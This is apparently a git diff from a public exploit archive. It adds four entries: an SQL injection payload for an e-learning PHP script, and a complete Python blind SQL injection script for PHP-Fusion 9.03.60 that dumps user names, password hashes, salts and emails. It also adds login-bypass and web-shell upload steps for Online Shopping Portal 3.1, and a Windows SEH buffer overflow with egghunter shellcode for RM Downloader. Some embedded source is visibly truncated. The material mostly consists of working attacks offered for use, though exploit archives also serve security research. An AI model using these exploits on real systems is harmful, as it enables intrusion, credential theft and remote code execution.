diff --git a/exploits/php/webapps/48629.txt b/exploits/php/webapps/48629.txt new file mode 100644 index 000000000..be214a2dc --- /dev/null +++ b/exploits/php/webapps/48629.txt @@ -0,0 +1,38 @@ +# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection +# Date: 2020-06-29 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://github.com/amitkolloldey/elearning-script +# Software Link: https://github.com/amitkolloldey/elearning-script +# Version: 0.1.0 +# Tested on: Kali Linux + +Source code(search.php): + No Result Found.Please Try With Another +Keywords."; + }else{ + while($search_row = +mysqli_fetch_array($run_search)): + $post_id = $search_row ['post_id']; + $post_title = $search_row ['post_title']; + $post_date = $search_row ['post_date']; + $post_author = $search_row ['post_author']; + $post_featured_image = $search_row ['post_image']; + $post_keywords = $search_row ['post_keywords']; + $post_content = substr($search_row +['post_content'],0,200); + ?> + +Payload: + http://127.0.0.1/e/search.php?search=a&search_submit=Search + http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 +FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT +(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search \ No newline at end of file diff --git a/exploits/php/webapps/48630.txt b/exploits/php/webapps/48630.txt new file mode 100644 index 000000000..e9067d3df --- /dev/null +++ b/exploits/php/webapps/48630.txt @@ -0,0 +1,205 @@ +# Exploit Title: PHP-Fusion 9.03.60 - PHP Object Injection +# Date: 2020-05-26 +# Exploit Author: coiffeur +# Vendor Homepage: https://www.php-fusion.co.uk/home.php +# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php +# Version: v9.03.60 + +# Description: +# PHP Object Injection to SQL injection (pre-auth) + + +import sys + +import requests + +import subprocess + +GENERATOR_NAME = "gen.php" +GENERATOR_CONTENT = """"'; + die; +} + +$ar["comment_item_id"] = "1"; +$ar["comment_item_type"] = $argv[1]; + +$payload = urlencode(base64_encode(serialize($ar))); +echo $payload; +?> +""" + + +DEBUG = 1 +DELTA = None +TRESHOLD = 0.60 +LIKE = "f%admin" +COLUMNS = ["user_id", "user_name", "user_algo", "user_salt", "user_password", + "user_admin_algo", "user_admin_salt", "user_admin_password", "user_email"] + + +def usage(): + banner = """NAME: PHPFusion v9.03.50, PHP Object Injection to SQL injection +SYNOPSIS: python poi_to_sqli_9.03.50.py +DESCRIPTION: + Dump the content of the table named fusionX...X_users +AUTHOR: coiffeur + """ + print(banner) + + +def generator(action): + if action == "w": + with open(GENERATOR_NAME, "w") as f: + f.write(GENERATOR_CONTENT) + if action == "r": + _ = subprocess.Popen(["rm", GENERATOR_NAME], stdout=subprocess.PIPE) + + +def generate_payload(text): + p = subprocess.Popen(["php", GENERATOR_NAME, text], stdout=subprocess.PIPE) + out, _ = p.communicate() + return out + + +def check(payload): + datas = {"comment_options": generate_payload(payload)} + r = requests.post( + url=f"{sys.argv[1]}/includes/classes/PHPFusion/Feedback/Comments.ajax.php", data=datas) + return r.elapsed.total_seconds() + + +def evaluate_delay(): + global DELTA + deltas = [] + payload = "' UNION SELECT SLEEP(2)-- - '" + for _ in range(3): + deltas.append(check(payload)) + DELTA = sum(deltas)/len(deltas) + + +def get_tbl_name_len(): + i = 0 + while 1: + payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '" + if check(payload) >= DELTA*TRESHOLD: + return i-1 + if i > 100: + print(f"[x] Exploit failed") + exit(-1) + i += 1 + + +def get_tbl_name(length): + tbl_name = "" + for i in range(1, length+1): + min, max = 0, 127-1 + while min < max: + mid = (max + min) // 2 + payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '" + if check(payload) >= DELTA*TRESHOLD: + max = mid + else: + min = mid + 1 + tbl_name += chr(min) + if DEBUG: + print(f"[DEBUG] Table name: {tbl_name}") + return tbl_name + + +def get_rows_number(tbl_name): + i = 0 + while 1: + payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '" + if check(payload) >= DELTA*TRESHOLD: + return i + i += 1 + + +def get_elt_len(tbl_name, column_name, offset): + i = 0 + while 1: + payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '" + if check(payload) >= DELTA*TRESHOLD: + if DEBUG: + print( + f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}") + return i-1 + i += 1 + + +def get_elt(tbl_name, column_name, offset, length): + elt = "" + for i in range(1, length+1): + min, max = 0, 127-1 + while min < max: + mid = (max + min) // 2 + payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '" + if check(payload) >= DELTA*TRESHOLD: + max = mid + else: + min = mid + 1 + elt += chr(min) + if DEBUG: + print( + f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}") + print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}") + return elt + + +def get_rows(tbl_name, row_number): + print(f"[*] Trying to dump {tbl_name}") + rows = [] + for offset in range(row_number): + row = [] + for column_name in COLUMNS: + elt_length = get_elt_len(tbl_name, column_name, offset) + row.append(get_elt(tbl_name, column_name, offset, elt_length)) + print(f"[*] Row {offset}: {row}") + rows.append(row) + print(f"[*] Rows: {rows}") + + +def main(): + if len(sys.argv) < 2: + print(usage()) + exit(-1) + + if DEBUG: + print(f"[*] Target: {sys.argv[1]}") + + if DEBUG: + print(f"[DEBUG] Writting generator to {GENERATOR_NAME}") + generator("w") + + evaluate_delay() + if DEBUG: + print(f"[*] Delta: {DELTA}") + + tbl_name_len = get_tbl_name_len() + if DEBUG: + print( + f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}") + + tbl_name = get_tbl_name(tbl_name_len) + print(f" Table name: {tbl_name}") + + prefix = f"{tbl_name.split('_')[0]}_" + print(f"[*] Prefix: {prefix}") + + user_table_name = f"{prefix}users" + + number_of_rows = get_rows_number(user_table_name) + if DEBUG: + print(f"[*] {user_table_name} got {number_of_rows} rows") + + get_rows(user_table_name, number_of_rows) + + if DEBUG: + print(f"[DEBUG] Removing {GENERATOR_NAME}") + generator("r") + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/48631.txt b/exploits/php/webapps/48631.txt new file mode 100644 index 000000000..cc3dee3bb --- /dev/null +++ b/exploits/php/webapps/48631.txt @@ -0,0 +1,43 @@ +# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass +# Date: 2020-06-25 +# Exploit Author: Ümit Yalçın +# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/ +# Version: 3.1 +# Tested on: Windows 10 / WampServer + +1- Authentication Bypass + +Go to following url! +http://localhost/shopping/admin/ + +Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1# + +username = admin'# +passwrod = what ever you want + + +2- Uploading Shell to Remote Code Execution + +After bypassed the authentication go to insert-product field +http://localhost/shopping/admin/insert-product.php + + +after that, upload you shell , as an example + + + + +and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like + +http://localhost/shopping/admin/productimages/1 +http://localhost/shopping/admin/productimages/2 +http://localhost/shopping/admin/productimages/3 +http://localhost/shopping/admin/productimages/4 +http://localhost/shopping/admin/productimages/5 + +When you find your shell, for example you found at 21 + +TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE \ No newline at end of file diff --git a/exploits/windows/local/48628.py b/exploits/windows/local/48628.py new file mode 100755 index 000000000..761579440 --- /dev/null +++ b/exploits/windows/local/48628.py @@ -0,0 +1,76 @@ +# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC) +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-29 +# Vulnerable Software: RM Downloader +# Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe +# Version: 2.50.60 2006.06.23 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +# Proof of Concept: + +# 1.- Run the python script, it will create a new file "RM_LCE.txt" +# 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard +# 3.- Turn off DEP for RMDownloader.exe +# 4.- Open 'RMDownloader.exe' +# 5.- Go to 'Load' tab +# 6.- Paste clipboard in 'Load' parameter +# 7.- Click on button 'OK' +# 8.- Two messageboxes will pop up, click OK +# 9.- Calc.exe runs. + +################################################################################################################################################# + +#Python "RM_LCE.py" Code: + +f= open("RM_LCE.txt", "w") + +junk="\x41" * 336 + + +egg = "w00tw00t" + +# msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00" + +buf = "" +buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29" +buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda" +buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48" +buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b" +buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81" +buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e" +buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf" +buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79" +buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8" +buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95" +buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62" +buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6" +buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb" +buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee" +buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90" +buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59" +buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec" + + +nseh ="\xeb\x06\x90\x90" + +#1002C531 5B POP EBX +#1002C532 58 POP EAX +#1002C533 C3 RETN +#C:\Program Files\RM Downloader\RDutility02.dll + + +seh="\x31\xc5\x02\x10" + +nops="\x90" * 20 + +egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" +egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t +egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" + + + +payload = junk + egg + buf + nseh + seh + nops + egghunter + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fae3f3c55..d05ea0aa0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11116,6 +11116,7 @@ id,file,description,date,author,type,platform,port 48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows, 48624,exploits/windows/local/48624.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-06-26,"Ethan Seow",local,windows, 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows, +48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42883,3 +42884,6 @@ id,file,description,date,author,type,platform,port 48623,exploits/php/webapps/48623.txt,"OpenEMR 5.0.1 - 'controller' Remote Code Execution",2020-06-26,"Emre ÖVÜNÇ",webapps,php, 48626,exploits/php/webapps/48626.txt,"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting",2020-06-30,"Anushree Priyadarshini",webapps,php, 48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php, +48629,exploits/php/webapps/48629.txt,"e-learning Php Script 0.1.0 - 'search' SQL Injection",2020-07-01,KeopssGroup0day_Inc,webapps,php, +48630,exploits/php/webapps/48630.txt,"PHP-Fusion 9.03.60 - PHP Object Injection",2020-07-01,coiffeur,webapps,php, +48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,